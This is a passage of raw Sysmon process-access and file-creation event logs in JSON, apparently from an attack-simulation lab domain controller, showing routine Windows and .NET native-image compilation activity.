0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:09.669","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1371-5F25-0000-0010E6CF0E00}","TargetProcessId":"4820","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:09","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8380,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:09.685\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1371-5F25-0000-0010E6CF0E00}\r\nTargetProcessId: 4820\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:09.685","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1371-5F25-0000-0010E6CF0E00}","TargetProcessId":"4820","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:09","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8381,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:09.716\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1371-5F25-0000-001080D30E00}\r\nTargetProcessId: 5036\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:09.716","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1371-5F25-0000-001080D30E00}","TargetProcessId":"5036","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:09","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8382,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:09.716\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1371-5F25-0000-001080D30E00}\r\nTargetProcessId: 5036\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:09.716","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1371-5F25-0000-001080D30E00}","TargetProcessId":"5036","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:09","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8383,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:09.716\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1371-5F25-0000-001080D30E00}\r\nTargetProcessId: 5036\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:09.716","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1371-5F25-0000-001080D30E00}","TargetProcessId":"5036","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:09","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8384,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:09.904\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:09.904","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:02:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8385,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:02:10.013\r\nProcessGuid: {E2A3D6B1-1371-5F25-0000-001080D30E00}\r\nProcessId: 5036\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\13ac-0\\System.DirectoryServices.Protocols.dll\r\nCreationUtcTime: 2020-08-01 07:02:10.013","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:02:10.013","ProcessGuid":"{E2A3D6B1-1371-5F25-0000-001080D30E00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\13ac-0\\System.DirectoryServices.Protocols.dll","CreationUtcTime":"2020-08-01 07:02:10.013","EventReceivedTime":"2020-08-01 07:02:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8386,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:10.044\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1372-5F25-0000-0010BFD80E00}\r\nTargetProcessId: 2980\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:10.044","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1372-5F25-0000-0010BFD80E00}","TargetProcessId":"2980","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8387,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:10.044\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1372-5F25-0000-0010BFD80E00}\r\nTargetProcessId: 2980\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:10.044","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1372-5F25-0000-0010BFD80E00}","TargetProcessId":"2980","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8388,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:10.044\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: 